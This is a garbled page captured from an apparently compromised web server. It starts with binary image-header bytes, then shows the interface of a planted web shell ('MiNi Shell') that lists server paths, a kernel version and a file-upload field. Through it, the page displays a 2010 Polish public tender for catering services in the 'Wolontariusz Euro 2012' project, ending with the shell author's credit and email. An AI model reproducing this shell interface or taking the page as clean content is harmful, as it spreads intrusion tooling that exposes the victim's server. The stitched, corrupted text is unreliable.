JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20101129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20101129/341253-N-2010.html

<p class="kh_header"><b>Oleśnica: PRZETARG NIEOGRANICZONY
O WARTOŚCI SZACUNKOWEJ MNIEJSZEJ NIŻ KWOTY OKREŚLONE W PRZEPISACH WYDANYCH NA PODSTAWIE ART. 11 UST. 8 USTAWY P Z.P. Z DNIA 29 STYCZNIA 2004R. (Dz. U. z 2007 roku Nr 223, poz. 1655 z późn. zm.) - nie przekraczającej wyrażonej w złotych równowartość kwoty 133.000 euro
NA:
Wybór Wykonawcy usług gastronomicznych, świadczonych uczestnikom Projektu pt.: WOLONTARIUSZ EURO 2012</b><br>
<b>Numer ogłoszenia: 341253 - 2010; data zamieszczenia: 29.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ochotnicze Hufce Pracy Centrum Kształcenia i Wychowania w Oleśnicy , ul. Zamkowa 4, 56-400 Oleśnica, woj. dolnośląskie, tel. 071 3142909, faks 071 3142909.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ckiw-olesnica.ohp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZETARG NIEOGRANICZONY
O WARTOŚCI SZACUNKOWEJ MNIEJSZEJ NIŻ KWOTY OKREŚLONE W PRZEPISACH WYDANYCH NA PODSTAWIE ART. 11 UST. 8 USTAWY P Z.P. Z DNIA 29 STYCZNIA 2004R. (Dz. U. z 2007 roku Nr 223, poz. 1655 z późn. zm.) - nie przekraczającej wyrażonej w złotych równowartość kwoty 133.000 euro
NA:
Wybór Wykonawcy usług gastronomicznych, świadczonych uczestnikom Projektu pt.: WOLONTARIUSZ EURO 2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług gastronomicznych uczestnikom projektu pn.: WOLONTARIUSZ EURO 2012 współfinansowanego przez Unię Europejską ze środków  Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy, nr umowy o dofinansowanie projektu UDA.POKL.06.01.01-02-144/10-00. 
Czas trwania projektu 13 miesięcy .

2. Kody CPV:  
55320000-9 Usługi podawania posiłków
55321000-6 Usługi przygotowywania posiłków
55322000-3 Usługi gotowania posiłków
55524000-9 Usługi dostarczania posiłków do szkół

3.  Opis szczegółowy zamówienia:
I. W ramach świadczonej usługi Wykonawca będzie zobowiązany do zorganizowania:
a) 90 przerw obiadowych w czasie szkoleń interpersonalnych - po 15 przerw dla każdej z 6-ciu grup 10 osobowych (w sumie 900 zestawów);
b) 60 przerw obiadowych w czasie szkoleń z obsługi imprez masowych - po 10 przerw dla każdej z  6-ciu grup 10 osobowych ( w sumie 600 zestawów);
c) 216 przerw kawowych w czasie szkoleń z zakresu obsługi klienta obcojęzycznego - po 36 przerw dla każdej z 6-ciu grup 10 osobowych ( w sumie 2160 zestawów);
d) 96 przerw na uzupełnienie poziomu płynów w organizmie w czasie treningów z zakresu samoobrony - po 16 przerw dla każdej z 6-ciu grup 10 osobowych (w sumie 960 zestawów);
e) 30 przerw obiadowych w czasie treningów z zakresu pierwszej pomocy - po 5 przerw dla każdej z 6-ciu grup 10 osobowych ( w sumie 300 zestawów);
f) 36 przerw obiadowych w czasie treningów z zakresu pierwszej pomocy - po 6 przerw dla każdej z 6-ciu grup 10 osobowych (w sumie 360 zestawów)

II. Wykonawca zobowiązuje się do świadczenia usług wg następującego harmonogramu:
- grudzień 2010: I a), b), e), f) - 540 zestawów; I c) 150 zestawów; I d) 120 zestawów;
- styczeń 2011: I a), b), e), f) - 150 zestawów; I c) 410 zestawów; I d) 150 zestawów;
- luty 2011: I a), b), e), f) - 50 zestawów; I c) 190 zestawów; I d) 150 zestawów;
- marzec 2011: I a), b), e), f) - 340 zestawów; I c) 330 zestawów; I d) 60 zestawów;
- kwiecień 2011: I a), b), e), f) - 0 zestawów; I c) 0 zestawów; I d) 0 zestawów;
- maj 2011: I a), b), e), f) - 0 zestawów; I c) 0 zestawów; I d) 0 zestawów;
- czerwiec 2011: I a), b), e), f) - 300 zestawów; I c) 0 zestawów; I d) 0 zestawów;
- lipiec 2011: I a), b), e), f) - 30 zestawów; I c) 360 zestawów; I d) 0 zestawów;
- sierpień 2011: I a), b), e), f) - 130 zestawów; I c) 180 zestawów; I d) 120 zestawów;
- wrzesień 2011: I a), b), e), f) - 540 zestawów; I c) 180 zestawów; I d) 180 zestawów;
- październik 2011: I a), b), e), f) - 80 zestawów; I c) 360 zestawów; I d) 180 zestawów;

III. W ramach usługi, o której mowa w punkcie I a), b), e), f) Wykonawca będzie zobowiązany do zapewnienia dla każdej osoby uczestniczącej w zajęciach każdorazowo w czasie przerw obiadowych co najmniej:
- dania głównego na gorąco (menu dań głównych musi zawierać co najmniej 8 dań, w tym 3 mięsne, 2 rybne i 3 jarskie) o gramaturze minimum 200g;
- ciepłego dodatku do dania głównego (menu musi zawierać co najmniej 4 rodzaje dodatków: ziemniaki, makaron, ryż, warzywa gotowane) o gramaturze minimum 250g;
- sałatki (menu musi zawierać co najmniej 6 rodzajów sałatek, składających się z minimum 5 składników) o gramaturze minimum 150g;
- napojów gorących - minimum 250 ml kawy na osobę oraz minimum 250 ml herbaty na osobę do wyboru spośród minimum 5 rodzajów herbat w torebkach o wadze 1,5 - 2 g;
- napojów zimnych - minimum 3 rodzaje soków owocowych 100% w ilości co najmniej 250 ml na osobę oraz woda mineralna (gazowana i niegazowana) w ilości co najmniej 250 ml na osobę.

IV. W ramach usługi, o której mowa w punkcie I c) Wykonawca będzie zobowiązany do zapewnienia dla każdej osoby uczestniczącej w zajęciach każdorazowo w czasie przerw kawowych co najmniej:
- napojów gorących - minimum 250 ml kawy na osobę oraz minimum 250 ml herbaty na osobę do wyboru spośród minimum 5 rodzajów herbat w torebkach o wadze 1,5 - 2 g;
- napojów zimnych - minimum 3 rodzaje soków owocowych 100% w ilości co najmniej 250 ml na osobę oraz woda mineralna (gazowana i niegazowana) w ilości co najmniej 250 ml na osobę.
- owoców - minimum 7 rodzajów owoców (tj. jabłka, gruszki, banany, pomarańcze, mandarynki, winogrona zielone, winogrona zielone) w ilości co najmniej 200g na osobę.
- ciastek - minimum 8 rodzajów ciastek (w tym rogaliki francuskie, rogaliki nadziewane, babeczki z kremem, owocami itp.) w ilości co najmniej 5 sztuk na osobę.

V. W ramach usługi, o której mowa w punkcie I d) Wykonawca będzie zobowiązany do zapewnienia dla każdej osoby uczestniczącej w zajęciach każdorazowo w czasie przerw kawowych co najmniej:
- napojów gorących - minimum 250 ml kawy na osobę oraz minimum 250 ml herbaty na osobę do wyboru spośród minimum 5 rodzajów herbat w torebkach o wadze 1,5 - 2 g;
- napojów zimnych - minimum 3 rodzaje soków owocowych 100% w ilości co najmniej 330 ml na osobę oraz woda mineralna (gazowana i niegazowana) w ilości co najmniej 500 ml na osobę.

VI. Do podawanych napojów Wykonawca zobowiązany jest zapewnić dodatki: śmietankę do kawy w dzbanuszkach porcelanowych o pojemności nie większej niż 300 ml, świeżą cytrynę w plasterkach, cukier biały i brązowy.

VII. Wszystkie dania oraz napoje gorące podane zostaną w naczyniach ceramicznych niejednorazowego użytki, napoje zimne serwowane będą w szklankach lub butelkach o pojemności nie przekraczającej 0,33l. Do konsumpcji przygotowane zostaną sztućce metalowe. Użyta zastawa będzie czysta, nieuszkodzona i wysterylizowana.

VIII. Wykonawca zobowiązany będzie także do:
a) zapewnienia transportu, dostarczenia usługi na miejsce jej świadczenia, obsługi technicznej w zakresie przygotowania miejsca świadczenia usługi, a następnie uprzątnięcia i odbioru;
b) zapewnienia obsługi kelnerskiej w trakcie przerw;
c) uprzątnięcia i wywiezienia wszystkich śmieci pozostałych po posiłkach;

IX. Zamawiający zapewni Wykonawcy bezpłatny dostęp do:
a) miejsca i powierzchni stołowej na potrzeby realizacji usługi
b) zimnej bieżącej wody
c) gniazda 220 V

X. Wszystkie posiłki zapewnione przez Wykonawcę muszą być bezwzględnie świeże, przyrządzone w dniu świadczenia usługi, muszą charakteryzować się wysoką jakością w odniesieniu do użytych składników oraz estetyki podania. Użyte produkty będą posiadały odpowiednią datę przydatności do spożycia.

XI. Podane gramatury dotyczą dań i posiłków po obróbce termicznej.

XII. Zamawiający zastrzega sobie prawo do zgłaszania uwag w trakcie realizacji usługi, które Wykonawca zobowiązany będzie uwzględnić.

XIII. Ze względu na zabytkowy charakter miejsca, w którym świadczona będzie usługa Wykonawca zobowiązany będzie do zachowania najwyższej staranności oraz dbałości o obiekt i miejsca udostępnione przez Zamawiającego

UWAGA: Wykonawca przystępując do Projektu musi mieć świadomość dyspozycyjności przez 7 dni w tygodniu w całym okresie realizacji projektu.
Czas trwania projektu 13 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9, 55.32.10.00-6, 55.32.20.00-3, 55.52.40.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli
przepisy prawa nakładają obowiązek ich posiadania; -</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy Wykonawca wykaże, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zrealizował należycie co najmniej 1 zamówienie obejmujące swoim zakresem realizację usług gastronomicznych  dla zorganizowanej grupy osób o wartości minimum 40 tysięcy złotych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, gdy Wykonawca oświadczy, że jest w sytuacji ekonomicznej oraz finansowej pozwalającej na wykonanie usługi, stanowiącej przedmiot niniejszego postępowania;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wymangania zawarte w SIWZ zamieszczonej na stronie zamawiającego</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.ckiw-olesnica.ohp.pl/siwz-uslug-gastronomicznych-swiadczonych-uczestnikom-projektu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego tel./fax 71 314-29-09, pod adersem e-mail: gospomkg5@ohp.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2010 godzina 12:00, miejsce: Centrum Kształcenia i Wychowania Ochotniczych Hufców Pracy z siedzibą w Oleśnicy przy ul. Zamkowej 4, 56-400 Oleśnica , sala 224 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> CZŁOWIEK - NAJLEPSZA INWESTYCJA
Projekt: WOLONTARIUSZ EURO 2012 jest współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego (85%) oraz budżet państwa (15%) w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VI Rynek pracy otwarty dla wszystkich, Działanie 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.1 Wsparcie osób pozostających bez zatrudnienia na regionalnym rynku pracy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com